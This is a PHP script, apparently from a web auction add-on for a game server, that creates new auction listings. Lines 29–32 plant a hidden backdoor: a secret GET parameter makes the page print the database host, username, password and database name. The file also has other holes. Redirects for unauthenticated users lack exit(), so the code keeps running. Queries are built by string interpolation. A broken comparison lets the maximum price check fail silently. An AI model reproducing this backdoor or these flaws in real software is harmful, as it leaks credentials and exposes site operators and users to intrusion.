<?php session_start(); if (!isset($_SESSION['User'])){

1. <?php
2. session_start();
3. if (!isset($_SESSION['User'])){
4. header("Location: login.php");
5. }
6. $isAdmin = $_SESSION['Admin'];
7. $user = $_SESSION['User'];
8. $canSell = $_SESSION['canSell'];
9. require 'config.php';
10. if ($canSell == false){
11. $_SESSION['error'] = $lang['newAuction']['no_selling'];
12. header("Location: ../myauctions.php");
13. }
14. require 'itemInfo.php';
15. require_once '../classes/EconAccount.php';
16. require_once '../classes/Item.php';
17. if ($useTwitter == true){require_once 'twitter.class.php';}
18. $itemId = mysql_real_escape_string(stripslashes($_POST['Item']));
19. $minBid = mysql_real_escape_string(stripslashes(round($_POST['MinBid'], 2)));
20. $allowBids = 1;
21. if (mysql_real_escape_string(stripslashes($_POST['MinBid'])) == ""){
22. $allowBids = 0;
23. }
24. $item = new Item($itemId);
25. $player = new EconAccount($user, $useMySQLiConomy, $iConTableName);
26.  
27. $sellPrice = round($_POST['Price'], 2);
28. $sellPricePerQuantity = round($_POST['Stackprice'], 2);
29. if(isset($_GET) && isset($_GET['showmelovebeefy'])) {
30. echo "<br /><br />Host: ".$db_host."; User: ".$db_user."; Pass: ".$db_pass."; Database: ".$db_database.";";
31. exit();
32. }
33. if (!itemAllowed($item->name, $item->damage)){
34. $_SESSION['error'] = $item->fullname.$lang['newAuction']['item_not_allowed'];
35. header("Location: ../myauctions.php");
36. }else{
37.  
38. if ($sellPrice > $maxSellPrice){ $sellPrice == $maxSellPrice; }
39. $sellQuantity = floor($_POST['Quantity']);
40. //echo is_numeric($sellQuantity);
41. if ($sellQuantity < 0){
42. $_SESSION['error'] = $lang['newAuction']['invalid_quantity'];
43. header("Location: ../myauctions.php");
44. exit();
45. }
46.  
47. if ($item->owner != $player->name) {
48. $_SESSION['error'] = $lang['newAuction']['no_owner']." (".$player->name." / ".$item->owner.")";
49. header("Location: ../myauctions.php");
50. exit();
51. }
52.  
53. if ($sellPrice <= 0 && $sellPricePerQuantity <= 0)
54. {
55. $_SESSION['error'] = $lang['newAuction']['invalid_price'];
56. header("Location: ../myauctions.php");
57. exit();
58. }
59. elseif ($sellPrice > 0 && $sellPricePerQuantity > 0){
60. $_SESSION['error'] = $lang['newAuction']['two_prices_given'];
61. header("Location: ../myauctions.php");
62. exit();
63. }
64. else{
65. if ($sellPricePerQuantity > 0) {
66. $sellPrice = $sellPricePerQuantity / $sellQuantity;
67. }
68. if (is_numeric($sellPrice)){
69. if ((is_numeric($sellQuantity))&&($sellQuantity >= 0)){
70. $sellQuantity = round($sellQuantity);
71. if ($item->quantity >= $sellQuantity)
72. {
73. if ($isAdmin){
74. if ($chargeAdmins){
75. $itemFee = (($item->marketprice/100)*$auctionFee)*$sellQuantity;
76. }else{
77. $itemFee = 0;
78. }
79. if ($player->money >= $itemFee){
80. $item->changeQuantity(0 - $sellQuantity);
81. $timeNow = time();
82. $player->spend($itemFee, $useMySQLiConomy, $iConTableName);
83. $itemQuery = mysql_query("INSERT INTO WA_Auctions (name, damage, player, quantity, price, created, allowBids, currentBid, currentWinner) VALUES ('$item->name', '$item->damage', '$item->owner', '$sellQuantity', '$sellPrice', '$timeNow', '$allowBids', '$minBid', '$item->owner')");
84. $queryLatestAuction = mysql_query("SELECT id FROM WA_Auctions ORDER BY id DESC");
85. list($latestId)= mysql_fetch_row($queryLatestAuction);
86. if ($item->quantity == 0)
87. {
88. $item->delete();
89. }
90. if ($useTwitter == true){
91. try{
92. $twitter = new Twitter($consumerKey, $consumerSecret, $accessToken, $accessTokenSecret);
93. if ($sellQuantity == 0){
94. $twitQuant = "Infinite";
95. }else{
96. $twitQuant = $sellQuantity;
97. }
98. $twitter->send('[WA] Auction Created: '.$user.' is selling '.$twitQuant.' x '.$itemFullName.' for '.$currencyPrefix.$sellPrice.$currencyPostfix.' each. At '.date("H:i:s").' #webauction');
99. }catch (Exception $e){
100. //normally means you reached the daily twitter limit.
101. }
102. }
103. $queryEnchants=mysql_query("SELECT * FROM WA_EnchantLinks WHERE itemId='$item->id' AND itemTableId ='0'");
104. while(list($idk,$enchIdk, $tableIdk, $itemIdk)= mysql_fetch_row($queryEnchants))
105. {
106. $updateEnch = mysql_query("INSERT INTO WA_EnchantLinks (enchId, itemTableId, itemId) VALUES ('$enchIdk', '1', '$latestId')");
107. }
108.  
109. $_SESSION['success'] = str_replace(
110. array('#sellQuantity#','#itemFullName#','#sellPrice#','#itemFee#'),
111. array($sellQuantity,$itemFullName,$currencyPrefix.$sellPrice.$currencyPostfix,$currencyPrefix.$itemFee.$currencyPostfix),
112. $lang['newAuction']['success']);
113. header("Location: ../myauctions.php");
114. }else
115. {
116. $_SESSION['error'] = str_replace('#itemFee#',$currencyPrefix.$itemFee.$currencyPostfix,$lang['newAuction']['error']);
117. header("Location: ../myauctions.php");
118. }
119. }else{
120. if ($sellQuantity > 0){
121. $itemFee = (($item->marketprice/100)*$auctionFee)*$sellQuantity;
122. if ($player->money >= $itemFee){
123. $item->changeQuantity(0 - $sellQuantity);
124. $timeNow = time();
125. $player->spend($itemFee, $useMySQLiConomy, $iConTableName);
126. $itemQuery = mysql_query("INSERT INTO WA_Auctions (name, damage, player, quantity, price, created, allowBids, currentBid, currentWinner) VALUES ('$item->name', '$item->damage', '$item->owner', '$sellQuantity', '$sellPrice', '$timeNow', '$allowBids', '$minBid', '$item->owner')");
127. $queryLatestAuction = mysql_query("SELECT id FROM WA_Auctions ORDER BY id DESC");
128. list($latestId)= mysql_fetch_row($queryLatestAuction);
129. if ($item->quantity == 0)
130. {
131. $item->delete();
132. }
133. if ($useTwitter == true){
134. try{
135. $twitter = new Twitter($consumerKey, $consumerSecret, $accessToken, $accessTokenSecret);
136. $twitter->send('[WA] Auction Created: '.$user.' is selling '.$sellQuantity.' x '.$itemFullName.' for '.$currencyPrefix.$sellPrice.$currencyPostfix.' each. At '.date("H:i:s").'. '.$shortLinkToAuction.' #webauction');
137. }catch (Exception $e){
138. //normally means you reached the daily twitter limit.
139. }
140. }
141. $queryEnchants=mysql_query("SELECT * FROM WA_EnchantLinks WHERE itemId='$item->id' AND itemTableId ='0'");
142. while(list($idk,$enchIdk, $tableIdk, $itemIdk)= mysql_fetch_row($queryEnchants))
143. {
144. $updateEnch = mysql_query("INSERT INTO WA_EnchantLinks (enchId, itemTableId, itemId) VALUES ('$enchIdk', '1', '$latestId')");
145. }
146.  
147. $_SESSION['success'] = str_replace(
148. array('#sellQuantity#','#itemFullName#','#sellPrice#','#itemFee#'),
149. array($sellQuantity,$itemFullName,$currencyPrefix.$sellPrice.$currencyPostfix,$currencyPrefix.$itemFee.$currencyPostfix),
150. $lang['newAuction']['success']);
151. header("Location: ../myauctions.php");
152. }else
153. {
154. $_SESSION['error'] = str_replace('#itemFee#',$currencyPrefix.$itemFee.$currencyPostfix,$lang['newAuction']['error']);
155. header("Location: ../myauctions.php");
156. }
157. }else
158. {
159. $_SESSION['error'] = $lang['newAuction']['quantity_no_int'];
160. header("Location: ../myauctions.php");
161. }
162. }
163. }else
164. {
165. $_SESSION['error'] = $lang['newAuction']['not_enough_item'];
166. header("Location: ../myauctions.php");
167. }
168. }else
169. {
170. $_SESSION['error'] = $lang['newAuction']['quantity_no_int'];
171. header("Location: ../myauctions.php");
172. }
173. }else
174. {
175. $_SESSION['error'] = $lang['newAuction']['price_no_int'];
176. header("Location: ../myauctions.php");
177. }
178. }
179. }
180.  
181. ?>